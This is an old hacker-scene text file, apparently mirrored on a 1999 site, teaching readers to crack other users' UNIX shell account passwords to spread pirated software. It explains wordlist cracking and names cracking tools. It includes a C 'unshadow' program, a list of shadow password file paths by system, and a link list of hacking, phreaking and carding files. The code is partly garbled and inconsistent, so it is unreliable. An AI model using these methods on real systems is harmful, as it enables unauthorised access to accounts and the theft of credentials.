 
+----------------------------------------------------------------------------+
¦    Author(s): ¦ Krypto                                                     ¦
+---------------+------------------------------------------------------------¦
¦      Subject: ¦ Cracking that "Passwd" File                                ¦
+----------------------------------------------------------------------------+
______________________________________________________________________________
______________________________________________________________________________
+----------------------------------------------------------------------------+
¦       R  E  A  L  I  T  Y     C  H  E  C  K     N  E  T  W  O  R  K!       ¦
+----------------------------------------------------------------------------¦
¦____________________________________________________________________________¦
¦____________________________________________________________________________¦
+----------------------------------------------------------------------------¦
¦                                                                            ¦
¦      I'm not an amazing "3l33t3" hacker, but I have picked up some things  ¦
¦  over the course of my scene life.                                         ¦
¦                                                                            ¦
¦      At times, many of us are without Internet shell account, therefore    ¦
¦  inhibiting our ablility to spread the warez.  Many of us seek to remedy   ¦
¦  this by cracking Internet shell accounts and doing as we please with      ¦
¦  them, mainly spreading.  Here, I'll show you the basic process in         ¦
¦  cracking UNIX accounts so that you can better your efforts in spreading   ¦
¦  them warez.                                                               ¦
¦                                                                            ¦
¦      Most Internet shells are UNIX based and therefore store the password  ¦
¦  to all the users in a file called the "passwd" file.  This is usually     ¦
¦  located at /etc/passwd.  The basic structure of the passwd file contains  ¦
¦  lines looking like this:                                                  ¦
¦                                                                            ¦
¦      bgates:VKa0XuF8KB4sc:5604:12:William Gates:/home/bgates:/bin/bash     ¦
¦                                                                            ¦
¦      Essentially, the line is broken down into these parts:                ¦
¦                                                                            ¦
¦  Username: bgates                                                          ¦
¦  Encrypted Password: VKa0XuF8KB4sc                                         ¦
¦  User number: 5604                                                         ¦
¦  Group Number: 12                                                          ¦
¦  Real Name (usually): William Gates                                        ¦
¦  Home Directory: /home/bgates                                              ¦
¦  Type of Shell: /bin/bash                                                  ¦
¦                                                                            ¦
¦      Your main concern is to crack each encrypted password for every       ¦
¦  user.  Because the encryption function is only unidirectional, you        ¦
¦  cannot decrypt the encrypted password.  You must run a cracking program   ¦
¦  which encrypts words then compares the encrypted word with the password.  ¦
¦  If they match you now have cracked the password.                          ¦
¦                                                                            ¦
¦      Because cracking relies on words that are encrypted, you MUST have a  ¦
¦  wordlist.  For beginners, a basic wordlist can be found as a dictionary   ¦
¦  file supplied as a part of UNIX.  The more the comprehensive the          ¦
¦  wordlist is, the better your chances of successfully cracking passwords.  ¦
¦  Next, you'll need a passwd cracker, which comes under numerous versions   ¦
¦  depending on your operating system.  Currently the best are:              ¦
¦                                                                            ¦
¦  Software            Operating System                                      ¦
¦  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                      ¦
¦  CrackerJack v1.4    DOS                                                   ¦
¦  Crack               UNIX                                                  ¦
¦                                                                            ¦
¦      Run the "cracking" program and feed your wordlist and passwd file     ¦
¦  into the program.  And watch as it "cracks" the passwords.                ¦
¦                                                                            ¦
¦      Sometimes you'll discover that the passwd file is incomplete or       ¦
¦  looks something like this:                                                ¦
¦                                                                            ¦
¦      bgates:*:5604:12:William Gates:/home/bgates:/bin/bash                 ¦
¦                                                                            ¦
¦      The * is called the token and means that the passwd file has been     ¦
¦  shadowed.  Password shadowing is a security system where the encrypted    ¦
¦  password field of /etc/passwd is replaced with a special token and the    ¦
¦  encrypted password is stored in a separate file which is not readable by  ¦
¦  normal system users.                                                      ¦
¦                                                                            ¦
¦      In order to defeat this, you'll need to write a C program and         ¦
¦  compile it similar to this:                                               ¦
¦                                                                            ¦
¦      Cut out the program at the bottom and save as "shadow.c"              ¦
¦                                                                            ¦
¦      Run "gcc shadow.c -o shadow" or "cc shadow.c -o shadow"               ¦
¦                                                                            ¦
¦      Run "./shadowpw >> password"                                          ¦
¦                                                                            ¦
¦      "password" should be your deshadowed password list.                   ¦
¦                                                                            ¦
¦      If you have any problems, or need any help whatsoever... DO NOT       ¦
¦  CONTACT ME!                                                               ¦
¦                                                                            ¦
+----------------------------------------------------------------------------¦
¦                                                                            ¦
¦  Sample Unshadow Program                                                   ¦
¦  ~~~~~~~~~~~~~~~~~~~~~~~                                                   ¦
¦                                                                            ¦
¦   struct  SHADOWPW {     /* see getpwent(3) */                             ¦
¦     char *pw_name;                                                         ¦
¦     char *pw_passwd;                                                       ¦
¦     int  pw_uid;                                                           ¦
¦     int  pw_gid;                                                           ¦
¦     int  pw_quota;                                                         ¦
¦     char *pw_comment;                                                      ¦
¦     char *pw_gecos;                                                        ¦
¦     char *pw_dir;                                                          ¦
¦     char *pw_shell;                                                        ¦
¦   };                                                                       ¦
¦   struct passwd *getpwent(), *getpwuid(), *getpwnam();                     ¦
¦                                                                            ¦
¦   #ifdef   elxsis?                                                         ¦
¦                                                                            ¦
¦   /* Name of the shadow password file. Contains password and aging info *  ¦
¦                                                                            ¦
¦   #define  SHADOWPW "/etc/shadowpw"                                        ¦
¦   #define  SHADOWPW_PAG "/etc/shadowpw.pag"                                ¦
¦   #define  SHADOWPW_DIR "/etc/shadowpw.dir"                                ¦
¦   /*                                                                       ¦
¦    *  Shadow password file pwd->pw_gecos field contains:                   ¦
¦    *                                                                       ¦
¦    *  ,,,,                ¦
¦    *                                                                       ¦
¦    *    = Type of password criteria to enforce (type int).           ¦
¦    *  BSD_CRIT (0), normal BSD.                                            ¦
¦    *  STR_CRIT (1), strong passwords.                                      ¦
¦    *    = Password aging period (type long).                       ¦
¦    *  0, no aging.                                                         ¦
¦    *  else, number of seconds in aging period.                             ¦
¦    *  	 = Time (seconds from epoch) of the last password        ¦
¦    *  change (type long).                                                  ¦
¦    *  0, never changed.n                                                   ¦
¦    *    = Time (seconds from epoch) that the current password    ¦
¦    *  was made the  (type long).                             ¦
¦    *  0, never changed.ewromsinm                                           ¦
¦    *   = Password (encrypted) saved for an aging  t  ¦
¦    *  prevent reuse during that period (type char [20]).                   ¦
¦    *  "*******", no .                                        ¦
¦    */                                                                      ¦
¦                                                                            ¦
¦   /* number of tries to change an aged password */                         ¦
¦                                                                            ¦
¦   #define  CHANGE_TRIES 3                                                  ¦
¦                                                                            ¦
¦   /* program to execute to change passwords */                             ¦
¦                                                                            ¦
¦   #define  PASSWD_PROG "/bin/passwd"                                       ¦
¦                                                                            ¦
¦   /* Name of the password aging exempt user names and max number of entir  ¦
¦                                                                            ¦
¦   #define  EXEMPTPW "/etc/exemptpw"                                        ¦
¦   #define MAX_EXEMPT 100                                                   ¦
¦                                                                            ¦
¦                                                                            ¦
¦   /* Password criteria to enforce */                                       ¦
¦                                                                            ¦
¦   #define BSD_CRIT 0 /* Normal BSD password criteria */                    ¦
¦   #define STR_CRIT 1  /* Strong password criteria */                       ¦
¦   #define MAX_CRIT 1                                                       ¦
¦   #endif   elxsi                                                           ¦
¦   #define NULL 0                                                           ¦
¦   main()                                                                   ¦
¦   {                                                                        ¦
¦   struct passwd *p;                                                        ¦
¦   int i;                                                                   ¦
¦   for (;1;) {;                                                             ¦
¦     p=getpwent();                                                          ¦
¦     if (p==NULL) return;                                                   ¦
¦     printpw(p);                                                            ¦
¦   }                                                                        ¦
¦   }                                                                        ¦
¦                                                                            ¦
¦   printpw(a)                                                               ¦
¦   struct SHADOWPW *a;                                                      ¦
¦   {                                                                        ¦
¦   printf("%s:%s:%d:%d:%s:%s:%s\n",                                         ¦
¦      a->pw_name,a->pw_passwd,a->pw_uid,a->pw_gid,                          ¦
¦      a->pw_gecos,a->pw_dir,a->pw_shell);                                   ¦
¦   }                                                                        ¦
¦                                                                            ¦
¦   /* SunOS 5.0  /etc/shadow */                                             ¦
¦   /* SunOS4.1+c2     /etc/security/passwd.adjunct */                       ¦
¦                                                                            ¦
+----------------------------------------------------------------------------¦
¦                                                                            ¦
¦      The passwd file is located in the following pathes for each system.   ¦
¦  To determine your UNIX system type, enter the following during the UNIX   ¦
¦  prompt:                                                                   ¦
¦                                                                            ¦
¦      uname -a                                                              ¦
¦                                                                            ¦
¦  UNIX Paths (Courtesy of 2600)                                             ¦
¦                                                                            ¦
¦  UNIX                  Path                            Token               ¦
¦  -----------------------------------------------------------------         ¦
¦  AIX 3                 /etc/security/passwd            !                   ¦
¦         or             /tcb/auth/files//                       ¦
¦  A/UX 3.0s             /tcb/files/auth/?/*                                 ¦
¦  BSD4.3-Reno           /etc/master.passwd              *                   ¦
¦  ConvexOS 10           /etc/shadpw                     *                   ¦
¦  ConvexOS 11           /etc/shadow                     *                   ¦
¦  DG/UX                 /etc/tcb/aa/user/               *                   ¦
¦  EP/IX                 /etc/shadow                     x                   ¦
¦  HP-UX                 /.secure/etc/passwd             *                   ¦
¦  IRIX 5                /etc/shadow                     x                   ¦
¦  Linux 1.1             /etc/shadow                     *                   ¦
¦  OSF/1                 /etc/passwd[.dir|.pag]          *                   ¦
¦  SCO Unix #.2.x        /tcb/auth/files//                      ¦
¦  SunOS4.1+c2           /etc/security/passwd.adjunct    ##username          ¦
¦  SunOS 5.0             /etc/shadow                                         ¦
¦                        
                  
This page was created Wed Aug 11 23:46:19 EDT 1999
Using Linux
 version 2.0.32
 on an i586
	Main Page @ Matarese.com
The Myth of the 2600Hz Detector @ Matarese.com      
Acquiring Account Information @ Matarese.com      
 
Act2! by Symantec @ Matarese.com      
All hacks / Annoyance @ Matarese.com      
 
Alt 2600 Group FAQ @ Matarese.com      
Hacking Angelfire @ Matarese.com      
 
Anonymous E-Mail @ Matarese.com      
Anonymous FTP: Frequently Asked Questions (FAQ) @ Matarese.com      
 
Maintaining Access - Implementing Backdoors @ Matarese.com      
How to Receive Banned Newsgroups FAQ @ Matarese.com      
 
Hacking BBS's @ Matarese.com      
phreaking tutorial @ Matarese.com      
 
The Bluebox @ Matarese.com      
List of Common Bugs @ Matarese.com      
 
Things that go Bump on the Internet @ Matarese.com      
Hacking Calling Cards @ Matarese.com      
 
Expanding the capacity of Caller ID Boxes @ Matarese.com      
What is Caller-ID? @ Matarese.com      
 
Hacking Call Back Verify @ Matarese.com      
CULT OF THE DEAD COW @ Matarese.com      
 
Cellular Roaming: The New Deals @ Matarese.com      
CELLULAR TELEPHONE PHREAKING PHILE SERIES @ Matarese.com      
 
Cracking Unix passwords @ Matarese.com      
Hacking Webpages @ Matarese.com      
 
The Matarese Circle @ Matarese.com      
Cisco Password Cracking Script @ Matarese.com      
 
Customer Name and Address @ Matarese.com      
Cops and Robbers | UNIX Security @ Matarese.com      
 
Cracking NT Passwords @ Matarese.com      
Odins cracking/coding and PPE resources @ Matarese.com      
 
Credit Carding Part I @ Matarese.com      
How do I defeat Copy Protection? @ Matarese.com      
 
What are the DTMF frequencies? @ Matarese.com      
Exploits FAQ @ Matarese.com      
 
Making Free Calls @ Matarese.com      
FTP Bouncing @ Matarese.com      
 
Hackers Encyclopedia @ Matarese.com      
The Conscience of a Hacker / Hacker Manifesto @ Matarese.com      
 
Hacking from Windows9x FTP @ Matarese.com      
Hacking Tripod @ Matarese.com      
 
Hacking Web Pages @ Matarese.com      
How to crack a UNIX password file. @ Matarese.com      
 
Hacking Servers : A Begginners Guide @ Matarese.com      
TIPS FOR TRACKING HACKERS @ Matarese.com      
 
Hacking Tutorial @ Matarese.com      
Hacking UNIX @ Matarese.com      
 
How to Hack the WWWboard Message Board 2.0 @ Matarese.com      
Hackers Handbook @ Matarese.com      
 
Guide to Harmless-Hacking @ Matarese.com      
All about security holes @ Matarese.com      
 
Hacking Hotmail @ Matarese.com      
How to crack by +ORC complete tutorial in one file (BIG!) @ Matarese.com      
 
]How to Hack from from Harlequin and Archangel @ Matarese.com      
Improve security by breaking into your site @ Matarese.com      
 
Ch1can0 BEOWULF @ Matarese.com      
Internet Security @ Matarese.com      
 
Bugs and Backdoors in IRC clients, scripts and bots @ Matarese.com      
IRC Hacking @ Matarese.com      
 
FAQ for Trading For FileZ in IRC @ Matarese.com      
Creating a Xdcc offer bot for irc @ Matarese.com      
 
Integrated Systems Digital Network @ Matarese.com      
Everything you should know about computer viruses @ Matarese.com      
 
Lan Technology Scorecard @ Matarese.com      
Local Area Signalling Services (LASS) and Custom Calling Feature Control Codes @ Matarese.com      
 
Harmless Hacking - Linux @ Matarese.com      
INDEX @ Matarese.com      
 
Loops wanted! @ Matarese.com      
Mail Spoofing Explained @ Matarese.com      
 
Microsoft IIS Vulnerability @ Matarese.com      
Microsoft(Yuk) Index Server exposes IDs and Passwords @ Matarese.com      
 
Intresting Microsoft Access 7.0 Trick @ Matarese.com      
MS Money 2.0 Back Door @ Matarese.com      
 
Mind Your Own Business (MYOB) @ Matarese.com      
Nameserver listing! @ Matarese.com      
 
Newbies handbook / HOW TO BEGIN IN THE WORLD OF H/P @ Matarese.com      
Bugs in Windows NT (Too many to list here completely...) @ Matarese.com      
 
This Hack is for the OptiChat Original Chat Room @ Matarese.com      
Internet Outdials @ Matarese.com      
 
Pager Frequencies @ Matarese.com      
Password Recovery Techniques @ Matarese.com      
 
How to Steal Local Calls from Most Payphones @ Matarese.com      
PBX's (Private Branch Exchanges) and WATS @ Matarese.com      
 
Cryptography / PGP @ Matarese.com      
The PHF bug @ Matarese.com      
 
Introduction to the Internet Protocols @ Matarese.com      
Analysis of QueSO Performance @ Matarese.com      
 
Finger - ATTACKING FROM THE OUTSIDE @ Matarese.com      
The PPP protocol (Point-to-Point Protocol) @ Matarese.com      
 
Scam news / Hacking / Phreaking / Anarchy / Virii @ Matarese.com      
Hacking your school computers @ Matarese.com      
 
L0pht Security Advisory - Sendmail 8.7.5 @ Matarese.com      
Sniffer FAQ V 1.7 @ Matarese.com      
 
THE COMPLETE SOCIAL ENGINEERING FAQ! @ Matarese.com      
Socket Services @ Matarese.com      
 
Softice Manual @ Matarese.com      
Softice Manual 2 @ Matarese.com      
 
Softice Manual 3 @ Matarese.com      
Softice Manual 4 @ Matarese.com      
 
Softice Manual 5 @ Matarese.com      
SSPING/JOLT patches @ Matarese.com      
 
THE ULTIMATE BEGINNER'S GUIDE TO HACKING AND PHREAKING @ Matarese.com      
@ Matarese.com      
 
@ Matarese.com      
TCP/IP Services (Phrack Stuff) @ Matarese.com      
 
Telenet The Secret Exposed @ Matarese.com      
WORKING OUT-TELNETS @ Matarese.com      
 
Covering your tracks, Theory @ Matarese.com      
How to defeat the Tripod Advertisement on your webpage. @ Matarese.com      
 
BT Basics @ Matarese.com      
BT Phreaking @ Matarese.com      
 
The Psychotic Internet Services' Unix Bible @ Matarese.com      
The Psychotic Internet Services' Unix Bible @ Matarese.com      
 
UNIX FAQ @ Matarese.com      
Gibe's UNIX COMMAND Bible @ Matarese.com      
 
How to become a Unix Hacker @ Matarese.com      
      
 
How do I post to a moderated newsgroup? @ Matarese.com      
What You Should Know About Computer Viruses @ Matarese.com      
 
How can I protect myself from viruses and such? @ Matarese.com      
What is a trojan/worm/virus/logic bomb? @ Matarese.com      
 
VMS Info (Password Cracking) @ Matarese.com      
HACKING THE WAL-MART ARMORGUARD COMPUTER PROTECTION SYSTEM @ Matarese.com      
 
Using web proxies to disguise your IP address @ Matarese.com      
Dig up hidden CD Keys @ Matarese.com      
 
X-Windows Security @ Matarese.com      
  Copyright (C) 1999 - Matarese.com